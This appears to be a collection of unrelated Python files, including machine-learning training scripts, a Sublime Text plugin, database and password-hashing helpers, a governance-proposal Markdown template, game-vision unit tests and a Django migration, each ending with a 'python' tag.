self._getIntegerVariable(expr.name,solver) else: return env[expr.name] else: return self._astToZ3Expr(expr.expr,solver,env) elif isinstance(expr, SymbolicType): utils.crash("{} is an unsupported SymbolicType of {}". format(expr, type(expr))) elif isinstance(expr, int): if env == None: return self._constant(expr,solver) else: return expr else: utils.crash("Unknown node during conversion from ast to Z3 (expressions): %s" % expr) def _add(self, l, r, solver): return l + r def _sub(self, l, r, solver): return l - r def _mul(self, l, r, solver): return l * r def _div(self, l, r, solver): return l / r def _mod(self, l, r, solver): return l % r def _lsh(self, l, r, solver): return l << r def _rsh(self, l, r, solver): return l >> r def _xor(self, l, r, solver): return l ^ r def _or(self, l, r, solver): return l | r def _and(self, l, r, solver): return l & r
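
# conversion notes: predToZ3() turns a non-boolean top-level expression into
# "expr != 0" (Python truthiness), while _wrapIf() maps comparison results back
# to integer 1/0 constants so they can keep participating in arithmetic when no
# concrete environment is supplied.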
python
import xgboost as xgb # read in data dtrain = xgb.DMatrix('../../data/data_20170722_01/train_data.txt') dtest = xgb.DMatrix('../../data/data_20170722_01/test_data.txt') # specify parameters via map, definition are same as c++ version param = {'max_depth':22, 'eta':0.1, 'silent':0, 'objective':'binary:logistic','min_child_weight':3,'gamma':14 } # specify validations set to watch performance watchlist = [(dtest,'eval'), (dtrain,'train')] num_round = 60 bst = xgb.train(param, dtrain, num_round, watchlist) # this is prediction preds = bst.predict(dtest) labels = dtest.get_label() positive_threshold_list = [0.50, 0.67, 0.80, 0.90, 0.95] for positive_threshold in positive_threshold_list: print('positive_threshold: ' + str(positive_threshold)) num_correct = sum(1 for i in range(len(preds)) if int(preds[i]>positive_threshold)==labels[i]) num_pred = len(preds) num_error = num_pred - num_correct print ('error=%d/%d=%f' % (num_error, num_pred, num_error /float(num_pred))) print ('accuracy=%d/%d=%f' % ( num_correct, num_pred, num_correct /float(num_pred))) num_true_positive = sum(1 for i in range(len(preds)) if int(preds[i]>positive_threshold)==labels[i] and labels[i]==1) num_positive_pred = sum(1 for i in range(len(preds)) if preds[i]>positive_threshold) print ('precision=%d/%d=%f' % ( num_true_positive, num_positive_pred, num_true_positive /float(num_positive_pred))) print('')
python
N = int(input()) N = str(N) if len(N)==1: print(1) elif len(N)==2: print(2) elif len(N)==3: print(3) elif len(N)>3: print("More than 3 digits")
python
from passlib.context import CryptContext PWD_CONTEXT = CryptContext(schemes=["bcrypt"], deprecated="auto") def verify_password(plain_password: str, hashed_password: str) -> bool: return PWD_CONTEXT.verify(plain_password, hashed_password) def get_password_hash(password: str) -> str: return PWD_CONTEXT.hash(password)
python
from .simple_ga import SimpleGA from .simple_es import SimpleES from .cma_es import CMA_ES from .de import DE from .pso import PSO from .open_es import OpenES from .pgpe import PGPE from .pbt import PBT from .persistent_es import PersistentES from .xnes import xNES from .ars import ARS from .sep_cma_es import Sep_CMA_ES from .bipop_cma_es import BIPOP_CMA_ES from .ipop_cma_es import IPOP_CMA_ES from .full_iamalgam import Full_iAMaLGaM from .indep_iamalgam import Indep_iAMaLGaM from .ma_es import MA_ES from .lm_ma_es import LM_MA_ES from .rm_es import RmES from .gld import GLD from .sim_anneal import SimAnneal __all__ = [ "SimpleGA", "SimpleES", "CMA_ES", "DE", "PSO", "OpenES", "PGPE", "PBT", "PersistentES", "xNES", "ARS", "Sep_CMA_ES", "BIPOP_CMA_ES", "IPOP_CMA_ES", "Full_iAMaLGaM", "Indep_iAMaLGaM", "MA_ES", "LM_MA_ES", "RmES", "GLD", "SimAnneal", ]
python
import random from model import Actor, Critic from ounoise import OUNoise import torch import torch.optim as optim GAMMA = 0.99 # discount factor TAU = 0.01 # for soft update of target parameters LR_ACTOR = 0.001 # learning rate of the actor LR_CRITIC = 0.001 # learning rate of the critic class Agent(): def __init__(self, state_size, action_size, num_agents, device, gamma=GAMMA, tau=TAU, lr_actor=LR_ACTOR, lr_critic=LR_CRITIC, random_seed=0): """ Initialize an Agent object. :param state_size: size of state :param action_size: size of action :param num_agents: number of agents :param gamma: discount factor :param tau: factor for soft update of target parameters :param lr_actor: Learning rate of actor :param lr_critic: Learning rate of critic :param random_seed: Random seed :param device: cuda or cpu """ self.device=device self.gamma = gamma self.tau=tau self.num_agents=num_agents self.state_size = state_size self.action_size = action_size self.full_state_size = state_size * num_agents self.full_action_size = action_size * num_agents self.seed = random.seed(random_seed) # Actor Network (w/ Target Network) self.actor_local = Actor(state_size, action_size, device, random_seed).to(device) self.actor_target = Actor(state_size, action_size, device, random_seed).to(device) self.actor_optimizer = optim.Adam(self.actor_local.parameters(), lr=lr_actor) # Critic Network (w/ Target Network) self.critic_local = Critic(self.full_state_size, self.full_action_size, device=device, random_seed=random_seed).to(device) self.critic_target = Critic(self.full_state_size, self.full_action_size, device=device, random_seed=random_seed).to(device) self.critic_optimizer = optim.Adam(self.critic_local.parameters(), lr=lr_critic, weight_decay=0) self.noise = OUNoise(action_size, random_seed) def save_model(self, agent_number): torch.save(self.actor_local.state_dict(), f'models/checkpoint_actor_{agent_number}.pth') torch.save(self.critic_local.state_dict(), f'models/checkpoint_critic_{agent_number}.pth') def load_model(self, agent_number): checkpoint = torch.load(f'models/checkpoint_actor_{agent_number}.pth', map_location=torch.device('cpu')) self.actor_local.load_state_dict(checkpoint) checkpoint = torch.load(f'models/checkpoint_critic_{agent_number}.pth', map_location=torch.device('cpu')) self.critic_local.load_state_dict(checkpoint) def act(self, state, noise = 0., train = False): """Returns actions for given state as per current policy. 
:param state: state as seen from single agent """ if train is True: self.actor_local.train() else: self.actor_local.eval() action = self.actor_local(state) if noise > 0: noise = torch.tensor(noise*self.noise.sample(), dtype=state.dtype, device=state.device) return action + noise def target_act(self, state, noise = 0.): #self.actor_target.eval() # convert to cpu() since noise is in cpu() self.actor_target.eval() action = self.actor_target(state).cpu() if noise > 0.: noise = torch.tensor(noise*self.noise.sample(), dtype=state.dtype, device=state.device) return action + noise def update_critic(self, rewards, dones, all_states, all_actions, all_next_states, all_next_actions): with torch.no_grad(): Q_targets_next = self.critic_target(all_next_states, all_next_actions) # Compute Q targets for current states (y_i) q_targets = rewards + (self.gamma * Q_targets_next * (1 - dones)) # Compute critic loss q_expected = self.critic_local(all_states, all_actions) # critic_loss = F.mse_loss(q_expected, q_targets) critic_loss = ((q_expected - q_targets.detach()) ** 2).mean() self.critic_optimizer.zero_grad() critic_loss.backward() self.critic_optimizer.step() def update_actor(self, all_states, all_predicted_actions): """Update actor network :param all_states: all states :param all_predicted_actions: all predicted actions """ actor_loss = -self.critic_local(all_states, all_predicted_actions).mean() self.actor_optimizer.zero_grad() actor_loss.backward(retain_graph=True) self.actor_optimizer.step() def update_targets(self): self.soft_update(self.actor_local, self.actor_target, self.tau) self.soft_update(self.critic_local, self.critic_target, self.tau) def soft_update(self, local_model, target_model, tau): """Soft update model parameters. θ_target = τ*θ_local + (1 - τ)*θ_target Params ====== local_model: PyTorch model (weights will be copied from) target_model: PyTorch model (weights will be copied to) tau (float): interpolation parameter """ for target_param, local_param in zip(target_model.parameters(), local_model.parameters()): target_param.data.copy_(tau * local_param.data + (1.0 - tau) * target_param.data) def reset(self): self.noise.reset()
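
# note: each actor only sees its own observation, but both critics consume the
# concatenated states and actions of all agents (full_state_size /
# full_action_size) -- the centralised-critic, decentralised-actor arrangement
# used by MADDPG-style trainers.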
python
from __future__ import print_function from sublime import Region, load_settings from sublime_plugin import TextCommand from collections import Iterable DEBUG = False def dbg(*msg): if DEBUG: print(' '.join(map(str, msg))) class MyCommand(TextCommand): def set_cursor_to(self, pos): """ Sets the cursor to a given position. If multiple positions are given, a multicursor will be made. """ dbg('setting cursor to {0}'.format(pos)) if not isinstance(pos, Iterable): pos = [pos] self.view.sel().clear() for p in pos: self.view.sel().add(Region(p, p)) def set_selection_to(self, start, end): dbg("setting selection to {0}".format((start, end))) self.view.sel().clear() self.view.sel().add(Region(start, end)) def get_char_at(self, pos): """ Return the character at a position """ return self.view.substr(Region(pos, pos + 1)) def get_current_line(self): """ Return the line at the current cursor """ return self.get_line_at(self.get_cursor()) def get_line_at(self, region): """ Returns the :class:`sublime.Line` at a :class:`sublime.Region` """ return self.view.line(region) def get_cursor(self): """ Returns the first current cursor """ return self.view.sel()[0] class MoveByParagraphCommand(MyCommand): def run(self, edit, extend=False, forward=False, ignore_blank_lines=True, stop_at_paragraph_begin=True, stop_at_paragraph_end=False): """ The cursor will move to beginning of a non-empty line that succeeds an empty one. Selection is supported when "extend" is True. """ if not stop_at_paragraph_begin and not stop_at_paragraph_end: print('[WARNING] MoveByParagraph: stop_at_paragraph_begin and ' 'stop_at_paragraph_end are both False, nothing will happen') return cursor = self.get_cursor() if cursor.a < cursor.b: start = cursor.end() else: start = cursor.begin() kwargs = dict(ignore_blank_lines=ignore_blank_lines, stop_at_paragraph_begin=stop_at_paragraph_begin, stop_at_paragraph_end=stop_at_paragraph_end) dbg('Starting from', cursor) if forward: next_cursor = self._find_paragraph_position_forward(start, **kwargs) else: next_cursor = self._find_paragraph_position_backward(start, **kwargs) dbg('Stopping at', next_cursor) if extend: dbg('set_selection_to', cursor.a, next_cursor.begin()) self.set_selection_to(cursor.a, next_cursor.begin()) else: dbg('set_cursor_to', next_cursor.begin()) self.set_cursor_to(next_cursor.begin()) cursor = self.get_cursor() self.view.show(cursor) def _find_paragraph_position_forward(self, start, ignore_blank_lines=True, stop_at_paragraph_begin=True, stop_at_paragraph_end=False): size = self.view.size() r = Region(start, size) # Obtain the lines that intersect the region lines = self.view.lines(r) for n, line in enumerate(lines[:-1]): if (stop_at_paragraph_begin and self._line_begins_paragraph(lines[n+1], line, ignore_blank_lines)): return Region(lines[n+1].a, lines[n+1].a) if (line.b != start and stop_at_paragraph_end and self._line_ends_paragraph(line, lines[n+1], ignore_blank_lines)): return Region(line.b, line.b) # Check if the last line is empty or not # If it is empty, make sure we jump to the end of the file # If it is not empty, jump to the end of the line if self._substr(lines[-1], ignore_blank_lines) == '': return Region(size, size) end = lines[-1].b # If the file ends with a single newline, it will be stuck # before this newline character unless we do this if end == start: return Region(end+1, end+1) return Region(end, end) def _find_paragraph_position_backward(self, start, ignore_blank_lines=True, stop_at_paragraph_begin=True, stop_at_paragraph_end=False): r = Region(0, start) # 
Obtain the lines that intersect the region lines = self.view.lines(r) lines.reverse() for n, line in enumerate(lines[:-1]): if (stop_at_paragraph_begin and self._line_begins_paragraph(line, lines[n+1], ignore_blank_lines)): return Region(line.a, line.a) if (stop_at_paragraph_end and self._line_ends_paragraph(lines[n+1], line, ignore_blank_lines)): return Region(lines[n+1].b, lines[n+1].b) return lines[-1] def _line_begins_paragraph(self, line, line_above, ignore_blank_lines): a = self._substr(line, ignore_blank_lines) b = self._substr(line_above, ignore_blank_lines) dbg('line_above', line_above, self.view.substr(line_above)) dbg('line', line, self.view.substr(line)) return a and not b def _line_ends_paragraph(self, line, line_below, ignore_blank_lines): a = self._substr(line, ignore_blank_lines) dbg('line', line, self.view.substr(line)) dbg('line_below', line_below, self.view.substr(line_below)) b = self._substr(line_below, ignore_blank_lines) return a and not b def _substr(self, line, ignore_blank_lines): s = self.view.substr(line) if ignore_blank_lines: return s.strip() return s
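
# example: with ignore_blank_lines=True and stop_at_paragraph_begin=True, moving
# forward places the cursor on the first non-blank line that follows the next
# blank line (the start of the next paragraph); stop_at_paragraph_end instead
# stops at the end of the last non-blank line before a blank one.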
python
import sys sys.path.append('C:\Python27\Lib\site-packages') import cv2 import numpy as np import os import pytesseract from PIL import Image from ConnectedAnalysis import ConnectedAnalysis import post_process as pp input_folder = r"C:\Users\SRIDHAR\Documents\python\final\seg_new"; output_folder= "temp"; def postProcess(str): #processess plate string res="" for ind in range(len(str)): ch = str[ind] if ((ch>='A' and ch<= 'Z') or (ch>='0' and ch<='9')): res+=ch if (ind>0 and str[ind-1]=='\\' and str[ind]=='n'): continue return res i=1 ini_res = [] for filename in os.listdir(input_folder): # print "alkfa" img = cv2.imread(os.path.join(input_folder,filename)); #44 #165 outName=os.path.join(output_folder,filename); thresh_image=img; finalstr = "" finalstr= pytesseract.image_to_string(Image.fromarray(cv2.bitwise_not(img))); finalstr = postProcess(finalstr) temp = "" for ind in range(len(filename)): if ind<len(filename)-4: temp += filename[ind] ini_res.append([int(temp),finalstr]) print (temp+" "+finalstr); i = i+1 #print(i) pp.result(ini_res)
python
from pymongo import MongoClient import os class Mongo: def __init__(self): self.__client = MongoClient(os.environ['MONGODB_CONNECTIONSTRING']) self.__db = self.__client.WebScrapingStocks def insert_quotes(self, quotes): dict_quotes = [] for quote in quotes: dict_quotes.append(quote.__dict__) self.__db.quotes.insert_many(dict_quotes) def get_quotes(self): return self.__db.quotes.find() def update_quote(self, quote): query = { "codigo": quote.codigo, "date": quote.date } new_value = {"$set": {"value" : quote.value}} self.__db.quotes.update_one(query, new_value)
python
class DubboError(RuntimeError): def __init__(self, status, msg): self.status = status self.message = msg
python
test_issue_data = """ #### Advanced Settings Modified? (Yes or No) ## What is your overall Commons Configuration strategy? {overall_strategy} ### [FORK MY PROPOSAL]() (link) # Module 1: Token Freeze and Token Thaw - **Token Freeze** is set to **{token_freeze_period} weeks**, meaning that 100% of TEC tokens minted for Hatchers will remain locked from being sold or transferred for {token_freeze_period} weeks. - **Token Thaw** is set to **{token_thaw_period} weeks**, meaning that from the end of Token Freeze, over the course of {token_thaw_period} weeks tokens minted for Hatchers gradually become liquid. At the end of {token_thaw_period} weeks 100% of the Hatchers' TEC tokens have become liquid. - The **Opening Price** is set to **{opening_price} wxDAI**, meaning at the outset of the Commons Upgrade the price to buy TEC on the Augmented Bonding Curve will be {opening_price} wxDAI. ### Strategy: {token_lockup_strategy} ### Data: ![](https://i.imgur.com/Wk3jgGo.jpg) | # of Weeks | % of Tokens Released | Price Floor of Token | | ---------------------------- | --------------------- | ---------------------- | | {token_lockup_week[0]} weeks | {tokens_released[0]}% | {price_floor[0]} wxDAI | | {token_lockup_week[1]} weeks | {tokens_released[1]}% | {price_floor[1]} wxDAI | | {token_lockup_week[2]} weeks | {tokens_released[2]}% | {price_floor[2]} wxDAI | | {token_lockup_week[3]} weeks | {tokens_released[3]}% | {price_floor[3]} wxDAI | | {token_lockup_week[4]} weeks | {tokens_released[4]}% | {price_floor[4]} wxDAI | | {token_lockup_week[5]} weeks | {tokens_released[5]}% | {price_floor[5]} wxDAI | # Module 2: Augmented Bonding Curve (ABC) - **Commons Tribute** is set to **{commons_tribute}%**, which means that {commons_tribute}% of the Hatch funds will go to the Common Pool and {commons_tribute_remainder}% will go to the Reserve Balance. - **Entry Tribute** is set to **{entry_tribute}%** meaning that from every **BUY** order on the ABC, {entry_tribute}% of the order value in wxDAI is subtracted and sent to the Common Pool. - **Exit Tribute** is set to **{exit_tribute}%** meaning that from every **SELL** order on the ABC, {exit_tribute}% of the order value in wxDAI is subtracted and sent to the Common Pool. ### Strategy: {abc_strategy} ### Data: >We're very bullish on TEC so we only provide the BUY scenario as the standard 3 steps that are used to compare different proposals ![](https://i.imgur.com/44MoI7N.png) | Step # | Current Price | Amount In | Tribute Collected | Amount Out | New Price | Price Slippage | | ------------------ | ------------------ | -------------- | ---------------------- | --------------- | -------------- | ------------------- | | **Step {step[0]}** | {current_price[0]} | {amount_in[0]} | {tribute_collected[0]} | {amount_out[0]} | {new_price[0]} | {price_slippage[0]} | | **Step {step[1]}** | {current_price[1]} | {amount_in[1]} | {tribute_collected[1]} | {amount_out[1]} | {new_price[1]} | {price_slippage[1]} | | **Step {step[2]}** | {current_price[2]} | {amount_in[2]} | {tribute_collected[2]} | {amount_out[2]} | {new_price[1]} | {price_slippage[2]} | # Module 3: Tao Voting - **Support Required** is set to **{support_required}%**, which means {support_required}% of all votes must be in favour of a proposal for it to pass. - **Minimum Quorum** is set to **{minimum_quorum}%**, meaning that {minimum_quorum}% of all tokens need to have voted on a proposal in order for it to become valid. 
- **Vote Duration** is **{vote_duration_days} day(s)**, meaning that eligible voters will have {vote_duration_days} day(s) to vote on a proposal.
- **Delegated Voting Period** is set for **{delegated_voting_days} day(s)**, meaning that Delegates will have {delegated_voting_days} day(s) to use their delegated voting power to vote on a proposal.
- **Quiet Ending Period** is set to **{quiet_ending_days} day(s)**, this means that {quiet_ending_days} day(s) before the end of the Vote Duration, if the vote outcome changes, the Quiet Ending Extension will be triggered.
- **Quiet Ending Extension** is set to **{quiet_ending_extension_days} day(s)**, meaning that if the vote outcome changes during the Quiet Ending Period, an additional {quiet_ending_extension_days} day(s) will be added for voting.
- **Execution Delay** is set to **{execution_delay_days} day(s)**, meaning that there is an {execution_delay_days} day delay after the vote is passed before the proposed action is executed.

### Strategy: {tao_voting_strategy}

### Data:

![](https://i.imgur.com/UE0J1sR.png)

| # of Quiet Ending Extensions                | No Extensions             | With 1 Extension                      | With 2 Extensions                      |
| ------------------------------------------- | ------------------------- | ------------------------------------- | -------------------------------------- |
| **Total Amount of Time to Complete a Vote** | {vote_duration_days} days | {vote_duration_days_1_extension} days | {vote_duration_days_2_extensions} days |

# Module 4: Conviction Voting Strategy

- **Conviction Growth** is set to **{conviction_growth_days} day(s)**, meaning that Conviction will increase by 50% every {conviction_growth_days} day(s).
- **Minimum Conviction** is set to **{minimum_conviction}%**, this means that to pass a funding request for an infinitely small amount will still take a minimum of {minimum_conviction}% of the total TEC currently active in the Conviction Voting application.
- The **Spending Limit** is set to **{relative_spending_limit}%**, which means that no more than {relative_spending_limit}% of the total funds in the Common Pool can be requested by a single proposal.

### Strategy: {conviction_voting_strategy}

### Data:

![](https://i.imgur.com/9RK5Hom.png)

| Variables                        | Scenario 1                | Scenario 2                | Scenario 3                | Scenario 4                | Scenario 5                | Scenario 6                |
| -------------------------------- | ------------------------- | ------------------------- | ------------------------- | ------------------------- | ------------------------- | ------------------------- |
| **Effective Supply**             | {effective_supply[0]}     | {effective_supply[1]}     | {effective_supply[2]}     | {effective_supply[3]}     | {effective_supply[4]}     | {effective_supply[5]}     |
| **Requested Amount (wxDAI)**     | **{requested_amount[0]}** | **{requested_amount[1]}** | **{requested_amount[2]}** | **{requested_amount[3]}** | **{requested_amount[4]}** | **{requested_amount[5]}** |
| Amount in Common Pool (wxDAI)    | {amount_common_pool[0]}   | {amount_common_pool[1]}   | {amount_common_pool[2]}   | {amount_common_pool[3]}   | {amount_common_pool[4]}   | {amount_common_pool[5]}   |
| Minimum Tokens Needed to Pass    | {min_tokens_pass[0]}      | {min_tokens_pass[1]}      | {min_tokens_pass[2]}      | {min_tokens_pass[3]}      | {min_tokens_pass[4]}      | {min_tokens_pass[5]}      |
| Tokens Needed To Pass in 2 weeks | {tokens_pass_2_weeks[0]}  | {tokens_pass_2_weeks[1]}  | {tokens_pass_2_weeks[2]}  | {tokens_pass_2_weeks[3]}  | {tokens_pass_2_weeks[4]}  | {tokens_pass_2_weeks[5]}  |

------

### [FORK MY PROPOSAL]() (link)

# Summary

### Module 1: Token Freeze & Token Thaw

| Parameter     | Value                       |
| ------------- | --------------------------- |
| Token Freeze  | {token_freeze_period} Weeks |
| Token Thaw    | {token_thaw_period} Weeks   |
| Opening Price | {opening_price} wxDAI       |

### Module 2: Augmented Bonding Curve

| Parameter        | Value              |
| ---------------- | ------------------ |
| Commons Tribute  | {commons_tribute}% |
| Entry Tribute    | {entry_tribute}%   |
| Exit Tribute     | {exit_tribute}%    |
| *_Reserve Ratio_ | {reserve_ratio}%   |

*Reserve Ratio is an output derived from the Opening Price and Commons Tribute. [Learn more about the Reserve Ratio here](https://forum.tecommons.org/t/augmented-bonding-curve-opening-price-reserve-ratio/516).

### Module 3: Disputable Voting

| Parameter               | Value                                |
| ----------------------- | ------------------------------------ |
| Support Required        | {support_required}%                  |
| Minimum Quorum          | {minimum_quorum}%                    |
| Vote Duration           | {vote_duration_days} day(s)          |
| Delegated Voting Period | {delegated_voting_days} day(s)       |
| Quiet Ending Period     | {quiet_ending_days} day(s)           |
| Quiet Ending Extension  | {quiet_ending_extension_days} day(s) |
| Execution Delay         | {execution_delay_days} day(s)        |

### Module 4: Conviction Voting

| Parameter          | Value                           |
| ------------------ | ------------------------------- |
| Conviction Growth  | {conviction_growth_days} day(s) |
| Minimum Conviction | {minimum_conviction}%           |
| Spending Limit     | {relative_spending_limit}%      |

### *Advanced Settings

>This will be empty or non-existent if the user did not change any advanced settings from their default. Any settings changed from default will show up here

| Parameter                | Value                       |
| ------------------------ | --------------------------- |
| Minimum Effective Supply | {minimum_effective_supply}% |
| Hatchers Rage Quit       | {hatchers_rage_quit}%       |
| Virtual Balance          | {virtual_balance} wxDAI     |

[*Learn more about Advanced Settings on the TEC forum](https://forum.tecommons.org/c/defi-legos-and-how-they-work-together/adv-ccd-params/27)

### [FORK MY PROPOSAL]() (link)
"""
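
# A minimal sketch (not part of the original test module) of how the derived
# placeholders referenced by the template above might be computed before it is
# rendered with str.format(). The helper name and argument names below are
# illustrative assumptions taken from the placeholder names in test_issue_data,
# not from the project's real formatting code.
def example_derived_fields(vote_duration_days, quiet_ending_extension_days, commons_tribute):
    return {
        # Total vote time grows by one extension length per triggered extension.
        "vote_duration_days_1_extension": vote_duration_days + quiet_ending_extension_days,
        "vote_duration_days_2_extensions": vote_duration_days + 2 * quiet_ending_extension_days,
        # Whatever share of the Hatch funds is not sent to the Common Pool stays in the Reserve.
        "commons_tribute_remainder": 100 - commons_tribute,
    }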
python
import unittest from rooms.room import Room from rooms.position import Position from rooms.vector import build_vector from rooms.actor import Actor from rooms.vision import Vision from rooms.geography.basic_geography import BasicGeography class SimpleVisionTest(unittest.TestCase): def setUp(self): self.room = Room("game1", "map1.room1", None) self.room.coords(0, 0, 100, 100) self.vision = Vision(self.room) self.room.vision = self.vision self.room.geography = BasicGeography() self.actor1 = Actor(self.room, None, None, actor_id="actor1") self.actor1.position = Position(1, 1) self.actor1.move_to(Position(5, 5)) self.actor2 = Actor(self.room, None, None, actor_id="actor2") self.actor2.position = Position(1, 1) self.actor2.move_to(Position(5, 5)) def testPropagateMessages(self): self.room.put_actor(self.actor1) queue = self.room.vision.connect_vision_queue(self.actor1.actor_id) command = queue.get_nowait() self.assertEquals("sync", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) self.actor1.state.something = "else" command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) self.actor1.visible = False command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) def testRemoveActor(self): self.room.put_actor(self.actor1) self.room.put_actor(self.actor2) queue = self.room.vision.connect_vision_queue(self.actor1.actor_id) command = queue.get_nowait() self.assertEquals("sync", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) self.room._remove_actor(self.actor2) command = queue.get_nowait() self.assertEquals("remove_actor", command['command']) self.assertTrue(queue.empty()) def testActorInvisible(self): self.room.put_actor(self.actor1) self.room.put_actor(self.actor2) queue = self.room.vision.connect_vision_queue(self.actor1.actor_id) command = queue.get_nowait() self.assertEquals("sync", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) command = queue.get_nowait() self.assertEquals("actor_update", command['command']) self.assertTrue(queue.empty()) self.actor2.visible = False command = queue.get_nowait() self.assertEquals("remove_actor", command['command']) self.assertTrue(queue.empty()) def testMultiLayeredDockingVisibility(self): # test if a is docked with b is docked with c that: # c is visible to all # b is invisible to all, but visible to a # a is invisible to all, but visible to a pass def testSendActorEvent(self): self.room.put_actor(self.actor1) self.room.put_actor(self.actor2) queue1 = self.room.vision.connect_vision_queue(self.actor1.actor_id) queue2 = self.room.vision.connect_vision_queue(self.actor2.actor_id) # clear out sync events queue1.queue.clear() queue2.queue.clear() self.actor1.send_message({'type': 'random'}) self.assertEquals( {'command': 'actor_message', 'actor_id': self.actor1.actor_id, 'data': {'type': 'random'}}, queue1.get_nowait()) self.assertEquals( {'command': 'actor_message', 'actor_id': self.actor1.actor_id, 'data': {'type': 'random'}}, queue2.get_nowait()) # invisible actors tell no tales self.actor1.visible = False # clear out invisible events queue1.queue.clear() queue2.queue.clear() self.actor1.send_message({'type': 'second'}) self.assertEquals( {'command': 
'actor_message', 'actor_id': self.actor1.actor_id, 'data': {'type': 'second'}}, queue1.get_nowait()) self.assertTrue(queue2.empty()) # also docked actors # also admin queues def testSendRoomEvent(self): self.room.put_actor(self.actor1) self.room.put_actor(self.actor2) queue1 = self.room.vision.connect_vision_queue(self.actor1.actor_id) queue2 = self.room.vision.connect_vision_queue(self.actor2.actor_id) # clear out sync events queue1.queue.clear() queue2.queue.clear() self.room.send_message('test', Position(0, 0), {'type': 'random'}) self.assertEquals( {'command': 'message', 'data': {'type': 'random'}, 'message_type': 'test', 'position': {u'x': 0.0, u'y': 0.0, u'z': 0.0}}, queue1.get_nowait()) self.assertEquals( {'command': 'message', 'data': {'type': 'random'}, 'message_type': 'test', 'position': {u'x': 0.0, u'y': 0.0, u'z': 0.0}}, queue2.get_nowait()) # also admin queues
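
# A hedged sketch (not from the original project) of how a consumer might drain
# a queue returned by Vision.connect_vision_queue(), dispatching on the
# 'command' field exercised by the tests above ('sync', 'actor_update',
# 'remove_actor', 'actor_message', 'message'). The handler mapping is an
# illustrative assumption.
def drain_vision_queue(queue, handlers):
    while not queue.empty():
        event = queue.get_nowait()
        handler = handlers.get(event['command'])
        if handler is not None:
            handler(event)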
python
# coding: utf-8 import sys, os sys.path.append(os.pardir) import numpy as np from common.layers import * from common.gradient import numerical_gradient from collections import OrderedDict from dataset.mnist import load_mnist class SGD: def __init__(self, lr=0.01): self.lr = lr def update(self, params, grads): for key in params.keys(): params[key] -= self.lr * grads[key] class TwoLayerNet(): def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01): self.params = {} self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size) self.params['b1'] = weight_init_std * np.zeros(hidden_size) self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size) self.params['b2'] = weight_init_std * np.zeros(output_size) self.layers = OrderedDict() self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1']) self.layers['Relu1'] = Relu() self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2']) self.lastLayer = SoftmaxWithLoss() def predict(self, x): for layer in self.layers.values(): x = layer.forward(x) return x def loss(self, x, t): y = self.predict(x) return self.lastLayer.forward(y, t) def accuracy(self, x, t): y = self.predict(x) y = np.argmax(y, axis=1) if t.ndim != 1 : t = np.argmax(t, axis=1) accuracy = np.sum(y == t) / float(x.shape[0]) return accuracy def numerical_gradient(self, x, t): loss_W = lambda W: self.loss(x, t) grads = {} grads['W1'] = numerical_gradient(loss_W, self.params['W1']) grads['b1'] = numerical_gradient(loss_W, self.params['b1']) grads['W2'] = numerical_gradient(loss_W, self.params['W2']) grads['b2'] = numerical_gradient(loss_W, self.params['b2']) return grads def gradient(self, x, t): # forward self.loss(x, t) # backward dout = 1 dout = self.lastLayer.backward(dout) layers = list(self.layers.values()) layers.reverse() for layer in layers: dout = layer.backward(dout) grads = {} grads['W1'] = self.layers['Affine1'].dW grads['b1'] = self.layers['Affine1'].db grads['W2'] = self.layers['Affine2'].dW grads['b2'] = self.layers['Affine2'].db return grads def gradient_check(): (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True) network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10) x_batch = x_train[:3] t_batch = t_train[:3] grad_numerical = network.numerical_gradient(x_batch, t_batch) grad_backprop = network.gradient(x_batch, t_batch) for key in grad_numerical.keys(): diff = np.average( np.abs(grad_backprop[key] - grad_numerical[key])) print(key + ':' + str(diff)) def train_network(): (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True) network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10) optimizer = SGD() iters_num = 10000 batch_size = 100 train_size = x_train.shape[0] iter_per_epoch = max(train_size / batch_size, 1) for i in range(iters_num): batch_mask = np.random.choice(train_size, batch_size) x_batch = x_train[batch_mask] t_batch = t_train[batch_mask] grads = network.gradient(x_batch, t_batch) optimizer.update(network.params, grads) if i % iter_per_epoch == 0: loss = network.loss(x_batch, t_batch) train_acc = network.accuracy(x_train, t_train) test_acc = network.accuracy(x_test, t_test) print('-----------------') print('loss : ' + str(loss)) print('train accuracy : ' + str(train_acc)) print('test accuracy : ' + str(test_acc)) if __name__ == '__main__': # gradient_check() train_network()
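
# The SGD class above defines the optimizer interface used by train_network():
# update(params, grads) mutates the parameter dict in place. As a sketch of a
# drop-in alternative (an addition, not part of the original script), a classic
# momentum optimizer can implement the same interface; swapping
# `optimizer = SGD()` for `optimizer = Momentum()` is all that would change.
class Momentum:
    def __init__(self, lr=0.01, momentum=0.9):
        self.lr = lr
        self.momentum = momentum
        self.v = None

    def update(self, params, grads):
        if self.v is None:
            self.v = {key: np.zeros_like(val) for key, val in params.items()}
        for key in params.keys():
            # Accumulate a velocity term, then step the parameters along it.
            self.v[key] = self.momentum * self.v[key] - self.lr * grads[key]
            params[key] += self.v[key]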
python
# Generated by Django 3.0.7 on 2020-08-04 09:56 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('contr_clienti', '0010_contractscan_actaditional'), ] operations = [ migrations.AlterField( model_name='contractscan', name='contract', field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='contr_clienti.Contract'), ), ]
python
